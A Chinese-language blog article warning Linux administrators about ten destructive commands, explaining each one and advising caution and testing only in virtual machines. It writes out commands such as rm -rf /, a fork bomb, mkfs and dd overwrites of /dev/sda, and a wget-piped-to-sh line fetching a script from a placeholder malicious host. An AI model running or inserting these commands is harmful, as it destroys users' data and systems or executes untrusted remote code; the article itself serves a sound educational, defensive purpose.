? 上一篇下一篇 ?

Linux里十個最危險的命令,Linux服務器管理人員使用前必須謹慎確認

  Linux命令行對于習慣用的人非常高效,好用,也十分有趣。但是,有時候也因為過于方便快捷導致某些操作很危險,尤其是在你不確定你自己在正在做什么時候。

這篇文章將會向你介紹十條最危險命令,如果沒在沒確認前,你最好不要嘗試著去使用。當然,以下命令通常都是在root權限下才能將愚蠢發揮到無可救藥;在普通用戶身份下,破壞的只是自己的一畝三分地。今天分享這篇主要的目的是想讓你意識到在你運行某些命令時應該三思而后行。

    Linux里10個最危險的命令介紹:

  1. rm -rf 命令

  rm -rf命令是刪除文件夾及其內容最快的方式之一。

  僅僅一丁點的敲錯或無知都可能導致不可恢復的系統崩壞。

  下列是一些rm 命令的選項:

  1.rm命令在Linux下通常用來刪除文件。

  2.rm -r 命令遞歸的刪除文件夾,甚至是空的文件夾。

  3.rm -f 命令能不經過詢問直接刪除‘只讀文件’。Linux下刪除文件并不在乎該文件是否是只讀的,而只是在意其父目錄是否有寫權限。所以,-f這個參數只是表示不必一個個刪除確認,而是一律悄悄刪除。另外,原始的rm命令其實也是沒有刪除提示的,只是一般的發行版都會將rm通過別名的方式增加-i參數來要求刪除確認,而-f則抑制了這個提示。

  4.rm -rf / : 強制刪除根目錄下所有東東。

  5.rm -rf *:強制刪除當前目錄的所有文件。

  6.rm -rf . : 強制刪除當前文件夾及其子文件夾。

  從現在起,當你要執行rm -rf命令時請留心一點。我們可以在“.bashrc”文件對‘rm‘命令創建rm -i的別名,來預防用 ‘rm‘命令刪除文件時的事故,它會要求你確認每一個刪除請求。(譯注:大多數發行版已經這樣做了,如果還沒有,請這樣做,并在使用-f參數前一定考慮好你在做什么)

 

  2. :{:|:&};: 命令

  這就是個fork 炸彈的實例。

  具體操作是通過定義一個名為 ‘:‘的函數,它會調用自己兩次,一次在前臺另一次運行在后臺。它會反復的執行下去直到系統崩潰。

 

  3. 命令> /dev/sda

  這個命令會將某個‘命令‘的輸出寫到塊設備/dev/sda中。

  該操作會將在塊設備中的所有數據塊替換為命令寫入的原始數據,從而導致整個塊設備的數據丟失。

 

  4. mv 文件夾 /dev/null

  這個命令會移動某個‘文件夾‘到/dev/null。

  在Linux中 /dev/null 或 null 設備是一個特殊的文件,所有寫入它的數據都會被清除,然后返回寫操作成功。

  當然,要說明的是這個命令并不能阻止數據恢復軟件——所以,真正的徹底毀滅,需要采用專用的軟件或者手法來完成。

 

  5. wget http://malicious_source -O- | sh

  該命令會從一個(也許是)惡意源下載一個腳本并執行。

  Wget命令會下載這個腳本,而sh會(無條件的)執行下載下來的腳本。

  注意: 你應該時刻注意你下載包或腳本的源。只能使用那些從可信任的源中下載腳本/程序。

 

  6. mkfs.ext3 /dev/sda

  上列命令會格式化塊設備‘sda’,在執行這個命令后你的塊設備(硬盤驅動器)會被格式化,直接讓你的系統達到不可恢復的階段。

  通常我們不會直接使用/dev/sda這樣的設備,除非是作為raw設備使用。

  一般都需要將sda分成類似sda1、sda2這樣的分區后才使用。當然,無論你使用sda還是sda1,這樣對塊設備或分區進行mkfs都是毀滅性的,上面的數據都會被蒸發了。

 

  7. > file

  這個命令常用來清空文件內容或記錄命令輸出。

  不過請在執行前,確認輸出的文件是空的或者還不存在,否則原來的文件可真是恢復不了了——連數據恢復軟件都未必能幫助你了。

  你可能真正想用的是“>>”,即累加新的輸出到文件,而不是刷新那個文件。

  如果用上列執行時輸入錯誤或無知的輸入類似 “> xt.conf”的命令會覆蓋配置文件或其他任何的系統配置文件。

 

  8. ^foo^bar

  這個命令用來編輯先前運行的命令而無需重打整個命令。

  用foobar命令時如果你沒有徹底檢查改變原始命令的風險,這可能導致真正的麻煩。

 

  9. dd if=/dev/random of=/dev/sda

  這個命令會向塊設備sda寫入隨機的垃圾文件從而擦出數據,讓你的系統可能陷入混亂和不可恢復的狀態。

  記得上面說過mv到黑洞并不能徹底刪除數據么?那么這個命令就是給了你一個徹底刪除的方法!當然為了保險起見,你可以覆寫多次。

 

  10. 隱藏命令

  下面的命令其實就是上面第一個命令 (rm -rf)。

  這里的代碼是隱藏在十六進制里的,一個無知的用戶可能就會被愚弄,如果在終端里運行下面命令可能會擦除你的根分區。

  真正的危險是隱藏起來的,不會被輕易的檢測到。你必須時刻留心你在做什么結果會怎樣。

  切記,千萬不要編譯/運行從未知來源的代碼。

  今天給大家帶來的是個命令到這里就結束了啦,雖然有些命令是可以恢復回來的,但是誰都不想經歷這個恢復的過程,不是嗎?所以,涉及到上面的命令一定要三思而后行!不過我們是搞技術的,是不是可以思考下怎么從技術上去避免這些命令呢?請千萬記住不要再服務器或者其他設備上隨意嘗試~

  如果你想測試它們,請在虛擬機上運行,不然文件丟失或者系統奔潰就不好了。

  以上就是數據吧云計算分享給大家的Linux系統統里10個最危險的命令的全部內容,希望對有接觸Linux系統的朋友們有所幫助,不會犯這些破壞能力超強的命名